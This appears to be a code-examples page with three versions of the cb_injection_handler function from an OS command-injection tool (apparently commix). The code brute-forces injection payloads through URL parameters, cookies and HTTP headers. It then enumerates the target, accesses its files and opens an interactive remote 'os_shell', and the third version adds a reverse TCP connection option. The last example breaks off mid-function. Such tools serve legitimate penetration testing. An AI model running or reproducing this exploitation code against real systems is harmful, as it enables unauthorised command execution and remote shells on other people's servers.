Ejemplo n.º 1
0
def cb_injection_handler(url, timesec, filename, http_request_method):

    counter = 1
    vp_flag = True
    no_result = True
    is_encoded = False
    export_injection_info = False
    injection_type = "results-based OS command injection"
    technique = "classic command injection technique"

    if not settings.LOAD_SESSION:
        info_msg = "Testing the " + "(" + injection_type.split(
            " ")[0] + ") " + technique + "... "
        sys.stdout.write(settings.print_info_msg(info_msg))
        sys.stdout.flush()
        if settings.VERBOSITY_LEVEL >= 1:
            print ""

    i = 0
    # Calculate all possible combinations
    total = len(settings.WHITESPACE) * len(settings.PREFIXES) * len(
        settings.SEPARATORS) * len(settings.SUFFIXES)
    for whitespace in settings.WHITESPACE:
        for prefix in settings.PREFIXES:
            for suffix in settings.SUFFIXES:
                for separator in settings.SEPARATORS:
                    if whitespace == " ":
                        whitespace = urllib.quote(whitespace)
                    # Check injection state
                    settings.DETECTION_PHASE = True
                    settings.EXPLOITATION_PHASE = False
                    # If a previous session is available.
                    if settings.LOAD_SESSION and session_handler.notification(
                            url, technique, injection_type):
                        try:
                            settings.CLASSIC_STATE = True
                            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, timesec, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(
                                url, http_request_method)
                            checks.check_for_stored_tamper(payload)
                        except TypeError:
                            err_msg = "An error occurred while accessing session file ('"
                            err_msg += settings.SESSION_FILE + "'). "
                            err_msg += "Use the '--flush-session' option."
                            print settings.print_critical_msg(err_msg)
                            sys.exit(0)

                    else:
                        i = i + 1
                        # Check for bad combination of prefix and separator
                        combination = prefix + separator
                        if combination in settings.JUNK_COMBINATION:
                            prefix = ""

                        # Change TAG on every request to prevent false-positive results.
                        TAG = ''.join(
                            random.choice(string.ascii_uppercase)
                            for i in range(6))

                        randv1 = random.randrange(100)
                        randv2 = random.randrange(100)
                        randvcalc = randv1 + randv2

                        # Define alter shell
                        alter_shell = menu.options.alter_shell

                        try:
                            if alter_shell:
                                # Classic -alter shell- decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision_alter_shell(
                                    separator, TAG, randv1, randv2)
                            else:
                                # Classic decision payload (check if host is vulnerable).
                                payload = cb_payloads.decision(
                                    separator, TAG, randv1, randv2)

                            # Define prefixes & suffixes
                            payload = parameters.prefixes(payload, prefix)
                            payload = parameters.suffixes(payload, suffix)

                            # Whitespace fixation
                            payload = re.sub(" ", whitespace, payload)

                            # Check for base64 / hex encoding
                            payload = checks.perform_payload_encoding(payload)

                            # Check if defined "--verbose" option.
                            if settings.VERBOSITY_LEVEL == 1:
                                print settings.print_payload(payload)
                            elif settings.VERBOSITY_LEVEL > 1:
                                info_msg = "Generating a payload for injection..."
                                print settings.print_info_msg(info_msg)
                                print settings.print_payload(payload)

                            # Cookie Injection
                            if settings.COOKIE_INJECTION == True:
                                # Check if target host is vulnerable to cookie injection.
                                vuln_parameter = parameters.specify_cookie_parameter(
                                    menu.options.cookie)
                                response = cb_injector.cookie_injection_test(
                                    url, vuln_parameter, payload)

                            # User-Agent Injection
                            elif settings.USER_AGENT_INJECTION == True:
                                # Check if target host is vulnerable to user-agent injection.
                                vuln_parameter = parameters.specify_user_agent_parameter(
                                    menu.options.agent)
                                response = cb_injector.user_agent_injection_test(
                                    url, vuln_parameter, payload)

                            # Referer Injection
                            elif settings.REFERER_INJECTION == True:
                                # Check if target host is vulnerable to referer injection.
                                vuln_parameter = parameters.specify_referer_parameter(
                                    menu.options.referer)
                                response = cb_injector.referer_injection_test(
                                    url, vuln_parameter, payload)

                            # Custom HTTP header Injection
                            elif settings.CUSTOM_HEADER_INJECTION == True:
                                # Check if target host is vulnerable to custom http header injection.
                                vuln_parameter = parameters.specify_custom_header_parameter(
                                    settings.INJECT_TAG)
                                response = cb_injector.custom_header_injection_test(
                                    url, vuln_parameter, payload)

                            else:
                                # Check if target host is vulnerable.
                                response, vuln_parameter = cb_injector.injection_test(
                                    payload, http_request_method, url)

                            # Try target page reload (if it is required).
                            if settings.URL_RELOAD:
                                response = requests.url_reload(url, timesec)

                            # Evaluate test results.
                            time.sleep(timesec)
                            shell = cb_injector.injection_test_results(
                                response, TAG, randvcalc)

                            if not settings.VERBOSITY_LEVEL >= 1:
                                percent = ((i * 100) / total)
                                float_percent = "{0:.1f}".format(
                                    round(((i * 100) / (total * 1.0)), 2))

                                if shell == False:
                                    info_msg = "Testing the " + "(" + injection_type.split(
                                        " "
                                    )[0] + ") " + technique + "... " + "[ " + float_percent + "%" + " ]"
                                    sys.stdout.write(
                                        "\r" +
                                        settings.print_info_msg(info_msg))
                                    sys.stdout.flush()

                                if float(float_percent) >= 99.9:
                                    if no_result == True:
                                        percent = Fore.RED + "FAILED" + Style.RESET_ALL
                                    else:
                                        percent = str(float_percent) + "%"
                                elif len(shell) != 0:
                                    percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
                                else:
                                    percent = str(float_percent) + "%"
                                info_msg = "Testing the " + "(" + injection_type.split(
                                    " "
                                )[0] + ") " + technique + "... " + "[ " + percent + " ]"
                                sys.stdout.write(
                                    "\r" + settings.print_info_msg(info_msg))
                                sys.stdout.flush()

                        except KeyboardInterrupt:
                            raise

                        except SystemExit:
                            raise

                        except:
                            continue

                    # Yaw, got shellz!
                    # Do some magic tricks!
                    if shell:
                        found = True
                        no_result = False
                        # Check injection state
                        settings.DETECTION_PHASE = False
                        settings.EXPLOITATION_PHASE = True
                        if settings.COOKIE_INJECTION == True:
                            header_name = " cookie"
                            found_vuln_parameter = vuln_parameter
                            the_type = " parameter"

                        elif settings.USER_AGENT_INJECTION == True:
                            header_name = " User-Agent"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.REFERER_INJECTION == True:
                            header_name = " Referer"
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        elif settings.CUSTOM_HEADER_INJECTION == True:
                            header_name = " " + settings.CUSTOM_HEADER_NAME
                            found_vuln_parameter = ""
                            the_type = " HTTP header"

                        else:
                            header_name = ""
                            the_type = " parameter"
                            if http_request_method == "GET":
                                found_vuln_parameter = parameters.vuln_GET_param(
                                    url)
                            else:
                                found_vuln_parameter = vuln_parameter

                        if len(found_vuln_parameter) != 0:
                            found_vuln_parameter = " '" + found_vuln_parameter + Style.RESET_ALL + Style.BRIGHT + "'"

                        # Print the findings to log file.
                        if export_injection_info == False:
                            export_injection_info = logs.add_type_and_technique(
                                export_injection_info, filename,
                                injection_type, technique)
                        if vp_flag == True:
                            vp_flag = logs.add_parameter(
                                vp_flag, filename, the_type, header_name,
                                http_request_method, vuln_parameter, payload)
                        logs.update_payload(filename, counter, payload)
                        counter = counter + 1

                        if not settings.VERBOSITY_LEVEL >= 1 and not settings.LOAD_SESSION:
                            print ""

                        # Print the findings to terminal.
                        success_msg = "The"
                        if found_vuln_parameter == " ":
                            success_msg += http_request_method + ""
                        success_msg += the_type + header_name
                        success_msg += found_vuln_parameter + " seems injectable via "
                        success_msg += "(" + injection_type.split(
                            " ")[0] + ") " + technique + "."
                        print settings.print_success_msg(success_msg)
                        print settings.SUB_CONTENT_SIGN + "Payload: " + re.sub(
                            "%20", " ", re.sub("%2B", "+",
                                               payload)) + Style.RESET_ALL
                        # Export session
                        if not settings.LOAD_SESSION:
                            session_handler.injection_point_importation(
                                url,
                                technique,
                                injection_type,
                                separator,
                                shell[0],
                                vuln_parameter,
                                prefix,
                                suffix,
                                TAG,
                                alter_shell,
                                payload,
                                http_request_method,
                                url_time_response=0,
                                timesec=0,
                                how_long=0,
                                output_length=0,
                                is_vulnerable=menu.options.level)
                        else:
                            whitespace = settings.WHITESPACE[0]
                            settings.LOAD_SESSION = False

                        # Check for any enumeration options.
                        new_line = True
                        if settings.ENUMERATION_DONE == True:
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to enumerate again? [Y/n] > "
                                    enumerate_again = raw_input(
                                        "\n" + settings.print_question_msg(
                                            question_msg)).lower()
                                else:
                                    enumerate_again = ""
                                if len(enumerate_again) == 0:
                                    enumerate_again = "y"
                                if enumerate_again in settings.CHOICE_YES:
                                    cb_enumeration.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename,
                                        timesec)
                                    #print ""
                                    break
                                elif enumerate_again in settings.CHOICE_NO:
                                    new_line = False
                                    break
                                elif enumerate_again in settings.CHOICE_QUIT:
                                    sys.exit(0)
                                else:
                                    err_msg = "'" + enumerate_again + "' is not a valid answer."
                                    print settings.print_error_msg(err_msg)
                                    pass
                        else:
                            if menu.enumeration_options():
                                cb_enumeration.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename, timesec)

                        if not menu.file_access_options(
                        ) and not menu.options.os_cmd and new_line:
                            print ""

                        # Check for any system file access options.
                        if settings.FILE_ACCESS_DONE == True:
                            if settings.ENUMERATION_DONE != True:
                                print ""
                            while True:
                                if not menu.options.batch:
                                    question_msg = "Do you want to access files again? [Y/n] > "
                                    sys.stdout.write(
                                        settings.print_question_msg(
                                            question_msg))
                                    file_access_again = sys.stdin.readline(
                                    ).replace("\n", "").lower()
                                else:
                                    file_access_again = ""
                                if len(file_access_again) == 0:
                                    file_access_again = "y"
                                if file_access_again in settings.CHOICE_YES:
                                    cb_file_access.do_check(
                                        separator, TAG, prefix, suffix,
                                        whitespace, http_request_method, url,
                                        vuln_parameter, alter_shell, filename,
                                        timesec)
                                    print ""
                                    break
                                elif file_access_again in settings.CHOICE_NO:
                                    break
                                elif file_access_again in settings.CHOICE_QUIT:
                                    sys.exit(0)
                                else:
                                    err_msg = "'" + file_access_again + "' is not a valid answer."
                                    print settings.print_error_msg(err_msg)
                                    pass
                        else:
                            if menu.file_access_options():
                                # if not menu.enumeration_options():
                                #   print ""
                                cb_file_access.do_check(
                                    separator, TAG, prefix, suffix, whitespace,
                                    http_request_method, url, vuln_parameter,
                                    alter_shell, filename, timesec)
                                print ""

                        # Check if defined single cmd.
                        if menu.options.os_cmd:
                            # if not menu.file_access_options():
                            #   print ""
                            cb_enumeration.single_os_cmd_exec(
                                separator, TAG, prefix, suffix, whitespace,
                                http_request_method, url, vuln_parameter,
                                alter_shell, filename, timesec)

                        # Pseudo-Terminal shell
                        go_back = False
                        go_back_again = False
                        while True:
                            if go_back == True:
                                break
                            if not menu.options.batch:
                                question_msg = "Do you want a Pseudo-Terminal shell? [Y/n] > "
                                sys.stdout.write(
                                    settings.print_question_msg(question_msg))
                                gotshell = sys.stdin.readline().replace(
                                    "\n", "").lower()
                            else:
                                gotshell = ""
                            if len(gotshell) == 0:
                                gotshell = "y"
                            if gotshell in settings.CHOICE_YES:
                                if not menu.options.batch:
                                    print ""
                                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                                if readline_error:
                                    checks.no_readline_module()
                                while True:
                                    try:
                                        if not readline_error:
                                            # Tab compliter
                                            readline.set_completer(
                                                menu.tab_completer)
                                            # MacOSX tab compliter
                                            if getattr(
                                                    readline, '__doc__', ''
                                            ) is not None and 'libedit' in getattr(
                                                    readline, '__doc__', ''):
                                                readline.parse_and_bind(
                                                    "bind ^I rl_complete")
                                            # Unix tab compliter
                                            else:
                                                readline.parse_and_bind(
                                                    "tab: complete")
                                        cmd = raw_input("""commix(""" +
                                                        Style.BRIGHT +
                                                        Fore.RED +
                                                        """os_shell""" +
                                                        Style.RESET_ALL +
                                                        """) > """)
                                        cmd = checks.escaped_cmd(cmd)
                                        if cmd.lower(
                                        ) in settings.SHELL_OPTIONS:
                                            go_back, go_back_again = shell_options.check_option(
                                                separator,
                                                TAG,
                                                cmd,
                                                prefix,
                                                suffix,
                                                whitespace,
                                                http_request_method,
                                                url,
                                                vuln_parameter,
                                                alter_shell,
                                                filename,
                                                technique,
                                                go_back,
                                                no_result,
                                                timesec,
                                                go_back_again,
                                                payload,
                                                OUTPUT_TEXTFILE="")
                                            if go_back and go_back_again == False:
                                                break
                                            if go_back and go_back_again:
                                                return True
                                        else:
                                            # Command execution results.
                                            time.sleep(timesec)
                                            response = cb_injector.injection(
                                                separator, TAG, cmd, prefix,
                                                suffix, whitespace,
                                                http_request_method, url,
                                                vuln_parameter, alter_shell,
                                                filename)
                                            # Try target page reload (if it is required).
                                            if settings.URL_RELOAD:
                                                response = requests.url_reload(
                                                    url, timesec)
                                            if menu.options.ignore_session or \
                                               session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
                                                # Evaluate injection results.
                                                try:
                                                    shell = cb_injector.injection_results(
                                                        response, TAG, cmd)
                                                    shell = "".join(
                                                        str(p) for p in shell)
                                                except:
                                                    print ""
                                                    continue
                                                if not menu.options.ignore_session:
                                                    session_handler.store_cmd(
                                                        url, cmd, shell,
                                                        vuln_parameter)
                                            else:
                                                shell = session_handler.export_stored_cmd(
                                                    url, cmd, vuln_parameter)
                                            if shell:
                                                html_parser = HTMLParser.HTMLParser(
                                                )
                                                shell = html_parser.unescape(
                                                    shell)
                                                # Update logs with executed cmds and execution results.
                                                logs.executed_command(
                                                    filename, cmd, shell)
                                            if shell != "":
                                                print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"
                                            else:
                                                if settings.VERBOSITY_LEVEL >= 1:
                                                    print ""
                                                err_msg = "The '" + cmd + "' command, does not return any output."
                                                print settings.print_critical_msg(
                                                    err_msg) + "\n"

                                    except KeyboardInterrupt:
                                        raise

                                    except SystemExit:
                                        raise

                            elif gotshell in settings.CHOICE_NO:
                                if checks.next_attack_vector(
                                        technique, go_back) == True:
                                    break
                                else:
                                    if no_result == True:
                                        return False
                                    else:
                                        return True

                            elif gotshell in settings.CHOICE_QUIT:
                                sys.exit(0)

                            else:
                                err_msg = "'" + gotshell + "' is not a valid answer."
                                print settings.print_error_msg(err_msg)
                                pass

    if no_result == True:
        if settings.VERBOSITY_LEVEL == 0:
            print ""
        return False
    else:
        sys.stdout.write("\r")
        sys.stdout.flush()
Ejemplo n.º 2
0
def cb_injection_handler(url, delay, filename, http_request_method):
  
  counter = 0
  vp_flag = True
  no_result = True
  is_encoded= False
  export_injection_info = False
  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()
  
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          i = i + 1

          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive results.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          
          randv1 = random.randrange(100)
          randv2 = random.randrange(100)
          randvcalc = randv1 + randv2
          
          # Define alter shell
          alter_shell = menu.options.alter_shell
        
          try:
            if not alter_shell:
              # Classic decision payload (check if host is vulnerable).
              payload = cb_payloads.decision(separator, TAG, randv1, randv2)
            else:
              # Classic -alter shell- decision payload (check if host is vulnerable).
              payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
            
            # Check if defined "--prefix" option.
            if menu.options.prefix:
              prefix = menu.options.prefix
              payload = prefix + payload
            else:
              payload = prefix + payload
              
            # Check if defined "--suffix" option.
            if menu.options.suffix:
              suffix = menu.options.suffix
              payload = payload + suffix
            else:
              payload = payload + suffix

            if separator == " " :
              payload = re.sub(" ", "%20", payload)
            else:
              payload = re.sub(" ", whitespace, payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + payload + Style.RESET_ALL)
              
            # Check if target host is vulnerable.
            response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)

            # if need page reload
            if menu.options.url_reload:
              time.sleep(delay)
              response = urllib.urlopen(url)
              
            # Evaluate test results.
            shell = cb_injector.injection_test_results(response, TAG, randvcalc)
            if not menu.options.verbose:
              percent = ((i*100)/total)
              if percent == 100:
                if no_result == True:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                else:
                  percent = str(percent)+"%"
              elif len(shell) != 0:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              else:
                percent = str(percent)+"%"
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise
          
          except:
            continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            # Print the findings to log file.
            if export_injection_info == False:
              output_file = open(filename + ".txt", "a")
              output_file.write("\n(+) Type : " + injection_type)
              output_file.write("\n(+) Technique : " + technique.title())
              output_file.close()
              export_injection_info = True

            if http_request_method == "GET":
              # Print the findings to log file
              if vp_flag == True:
                output_file = open(filename + ".txt", "a")
                output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                output_file.write("\n")
                vp_flag = False
                output_file.close()
                
              counter = counter + 1
              output_file = open(filename + ".txt", "a")
              output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
              output_file.close()
              
              #Vulnerable Parameter
              GET_vuln_param = parameters.vuln_GET_param(url)

              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + GET_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL

            else :
              # Print the findings to log file
              if vp_flag == True:
                output_file = open(filename + ".txt", "a")
                output_file.write("\n(+) Parameter : " + vuln_parameter + " (" + http_request_method + ")")
                output_file.write("\n")
                vp_flag = False
                output_file.close()
                
              counter = counter + 1
              output_file = open(filename + ".txt", "a")
              output_file.write("  ("+str(counter)+") Payload : "+ re.sub("%20", " ", payload) + "\n")
              output_file.close()
              
              #Vulnerable Parameter
              POST_vuln_param = vuln_parameter
              
              # Print the findings to terminal.
              print Style.BRIGHT + "\n(!) The ("+ http_request_method + ") '" + Style.UNDERLINE + POST_vuln_param + Style.RESET_ALL + Style.BRIGHT + "' parameter is vulnerable to "+ injection_type +"."+ Style.RESET_ALL
              print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
              print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
              print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", payload) + Style.RESET_ALL
              
            # Check for any enumeration options.
            cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)

            # Check for any system file access options.
            cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
            
            # Pseudo-Terminal shell
            while True:
              gotshell = raw_input("\n(*) Do you want a Pseudo-Terminal shell? [Y/n] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type 'q' or use <Ctrl-C> to quit)"
                while True:
                  try:
                    cmd = raw_input("Shell > ")
                    if cmd == "q":
                      sys.exit(0)
                      
                    else:
                      # The main command injection exploitation.
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell)
                      
                      # if need page reload
                      if menu.options.url_reload:
                        time.sleep(delay)
                        response = urllib.urlopen(url)
                        
                      # Command execution results.
                      shell = cb_injector.injection_results(response, TAG)
                      if shell:
                        shell = "".join(str(p) for p in shell)
                        print "\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL + "\n"

                  except KeyboardInterrupt: 
                    print ""
                    sys.exit(0)

              elif gotshell in settings.CHOISE_NO:
                if menu.options.verbose:
                  sys.stdout.write("\r(*) Continue testing the "+ technique +"... ")
                  sys.stdout.flush()
                break
              
              else:
                if gotshell == "":
                  gotshell = "enter"
                print Back.RED + "(x) Error: '" + gotshell + "' is not a valid answer." + Style.RESET_ALL
                pass
              
  if no_result == True:
    if menu.options.verbose == False:
      print ""
      return False
    else:
      print ""
      return False
  else :
    sys.stdout.write("\r")
    sys.stdout.flush()
Ejemplo n.º 3
0
def cb_injection_handler(url, delay, filename, http_request_method):
  
  counter = 1
  vp_flag = True
  no_result = True
  is_encoded= False
  export_injection_info = False

  injection_type = "Results-based Command Injection"
  technique = "classic injection technique"
      
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()
  
  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACES) * len(settings.PREFIXES) * len(settings.SEPARATORS) * len(settings.SUFFIXES)
  for whitespace in settings.WHITESPACES:
    for prefix in settings.PREFIXES:
      for suffix in settings.SUFFIXES:
        for separator in settings.SEPARATORS:
          i = i + 1

          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          # Change TAG on every request to prevent false-positive results.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          
          randv1 = random.randrange(100)
          randv2 = random.randrange(100)
          randvcalc = randv1 + randv2
          
          # Define alter shell
          alter_shell = menu.options.alter_shell
        
          try:
            if alter_shell:
              # Classic -alter shell- decision payload (check if host is vulnerable).
              payload = cb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
            else:
              # Classic decision payload (check if host is vulnerable).
              payload = cb_payloads.decision(separator, TAG, randv1, randv2)
            
            # Define prefixes & suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            if menu.options.base64:
              payload = urllib.unquote(payload)
              payload = base64.b64encode(payload)
            else:
              if separator == " " :
                payload = re.sub(" ", "%20", payload)
              else:
                payload = re.sub(" ", whitespace, payload)

            # Check if defined "--verbose" option.
            if menu.options.verbose:
              sys.stdout.write("\n" + Fore.GREY + "(~) Payload: " + payload + Style.RESET_ALL)
              
            # if need page reload
            if menu.options.url_reload:
              time.sleep(delay)
              response = urllib.urlopen(url)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              response = cb_injector.cookie_injection_test(url, vuln_parameter, payload)
              
            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              response = cb_injector.user_agent_injection_test(url, vuln_parameter, payload)

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              response = cb_injector.referer_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              response, vuln_parameter = cb_injector.injection_test(payload, http_request_method, url)

            # Evaluate test results.
            shell = cb_injector.injection_test_results(response, TAG, randvcalc)

            if not menu.options.verbose:
              percent = ((i*100)/total)
              float_percent = "{0:.1f}".format(round(((i*100)/(total*1.0)),2))
            
              if shell == False:
                sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + float_percent +"%" + " ]")  
                sys.stdout.flush()

              if percent == 100:
                if no_result == True:
                  percent = Fore.RED + "FAILED" + Style.RESET_ALL
                else:
                  percent = str(float_percent)+"%"
              elif len(shell) != 0:
                percent = Fore.GREEN + "SUCCEED" + Style.RESET_ALL
              else:
                percent = str(float_percent)+"%"
              sys.stdout.write("\r(*) Testing the "+ technique + "... " +  "[ " + percent + " ]")  
              sys.stdout.flush()
              
          except KeyboardInterrupt: 
            raise

          except SystemExit: 
            raise

          except:
            continue
          
          # Yaw, got shellz! 
          # Do some magic tricks!
          if shell:
            found = True
            no_result = False

            if settings.COOKIE_INJECTION == True: 
              header_name = " Cookie"
              found_vuln_parameter = vuln_parameter
              the_type = " HTTP header"

            elif settings.USER_AGENT_INJECTION == True: 
              header_name = " User-Agent"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            elif settings.REFERER_INJECTION == True: 
              header_name = " Referer"
              found_vuln_parameter = ""
              the_type = " HTTP header"

            else:    
              header_name = ""
              the_type = " parameter"
              if http_request_method == "GET":
                found_vuln_parameter = parameters.vuln_GET_param(url)
              else :
                found_vuln_parameter = vuln_parameter

            if len(found_vuln_parameter) != 0 :
              found_vuln_parameter = " '" + Style.UNDERLINE + found_vuln_parameter + Style.RESET_ALL  + Style.BRIGHT + "'" 

            # Print the findings to log file.
            if export_injection_info == False:
              export_injection_info = logs.add_type_and_technique(export_injection_info, filename, injection_type, technique)
            if vp_flag == True:
              vp_flag = logs.add_parameter(vp_flag, filename, http_request_method, vuln_parameter, payload)
            logs.update_payload(filename, counter, payload) 
            counter = counter + 1
            
            # Print the findings to terminal.
            print Style.BRIGHT + "\n(!) The ("+ http_request_method + ")" + found_vuln_parameter + header_name + the_type + " is vulnerable to "+ injection_type + "." + Style.RESET_ALL
            print "  (+) Type : "+ Fore.YELLOW + Style.BRIGHT + injection_type + Style.RESET_ALL + ""
            print "  (+) Technique : "+ Fore.YELLOW + Style.BRIGHT + technique.title() + Style.RESET_ALL + ""
            print "  (+) Payload : "+ Fore.YELLOW + Style.BRIGHT + re.sub("%20", " ", re.sub("%2B", "+",payload)) + Style.RESET_ALL
            
            # Check for any enumeration options.
            if settings.ENUMERATION_DONE == True :
              while True:
                enumerate_again = raw_input("\n(?) Do you want to enumerate again? [Y/n/q] > ").lower()
                if enumerate_again in settings.CHOISE_YES:
                  cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                  break
                elif enumerate_again in settings.CHOISE_NO: 
                  break
                elif enumerate_again in settings.CHOISE_QUIT:
                  sys.exit(0)
                else:
                  if enumerate_again == "":
                    enumerate_again = "enter"
                  print Back.RED + "(x) Error: '" + enumerate_again + "' is not a valid answer." + Style.RESET_ALL
                  pass
            else:
              cb_enumeration.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)

            # Check for any system file access options.
            if settings.FILE_ACCESS_DONE == True :
              while True:
                file_access_again = raw_input("(?) Do you want to access files again? [Y/n/q] > ").lower()
                if file_access_again in settings.CHOISE_YES:
                  if not menu.options.verbose:
                    print ""
                  cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                  break
                elif file_access_again in settings.CHOISE_NO: 
                  break
                elif file_access_again in settings.CHOISE_QUIT:
                  sys.exit(0)
                else:
                  if file_access_again == "":
                    file_access_again  = "enter"
                  print Back.RED + "(x) Error: '" + file_access_again  + "' is not a valid answer." + Style.RESET_ALL
                  pass
            else:
              cb_file_access.do_check(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)

            # Check if defined single cmd.
            if menu.options.os_cmd:
              cb_enumeration.single_os_cmd_exec(separator, TAG, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)

            # Pseudo-Terminal shell
            go_back = False
            go_back_again = False
            while True:
              if go_back == True:
                break
              gotshell = raw_input("(?) Do you want a Pseudo-Terminal shell? [Y/n/q] > ").lower()
              if gotshell in settings.CHOISE_YES:
                print ""
                print "Pseudo-Terminal (type '" + Style.BRIGHT + "?" + Style.RESET_ALL + "' for available options)"
                while True:
                  try:
                    # Tab compliter
                    readline.set_completer(menu.tab_completer)
                    readline.parse_and_bind("tab: complete")
                    cmd = raw_input("""commix(""" + Style.BRIGHT + Fore.RED + """os_shell""" + Style.RESET_ALL + """) > """)
                    cmd = checks.escaped_cmd(cmd)
                    if cmd.lower() in settings.SHELL_OPTIONS:
                      os_shell_option = checks.check_os_shell_options(cmd.lower(), technique, go_back, no_result) 
                      if os_shell_option == False:
                        return False
                      elif os_shell_option == "quit":                    
                        sys.exit(0)
                      elif os_shell_option == "back":
                        go_back = True
                        break
                      elif os_shell_option == "os_shell": 
                        print Fore.YELLOW + "(^) Warning: You are already into the 'os_shell' mode." + Style.RESET_ALL + "\n"
                      elif os_shell_option == "reverse_tcp":
                        # Set up LHOST / LPORT for The reverse TCP connection.
                        lhost, lport = reverse_tcp.configure_reverse_tcp()
                        while True:
                          if lhost and lport in settings.SHELL_OPTIONS:
                            result = checks.check_reverse_tcp_options(lhost)
                          else:  
                            cmd = reverse_tcp.reverse_tcp_options(lhost, lport)
                            result = checks.check_reverse_tcp_options(cmd)
                          if result != None:
                            if result == 0:
                              return False
                            elif result == 1 or result == 2:
                              go_back_again = True
                              break
                          # Command execution results.
                          response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                          # Evaluate injection results.
                          shell = cb_injector.injection_results(response, TAG)
                          if menu.options.verbose:
                            print ""
                          print Back.RED + "(x) Error: The reverse TCP connection to the target host has been failed!" + Style.RESET_ALL
                      else:
                        pass
                    else:
                      # Command execution results.
                      response = cb_injector.injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename)
                      
                      # if need page reload
                      if menu.options.url_reload:
                        time.sleep(delay)
                        response = urllib.urlopen(url)
                        
                      # Evaluate injection results.
                      shell = cb_injector.injection_results(response, TAG)
                      if shell:
                        shell = "".join(str(p) for p in shell)
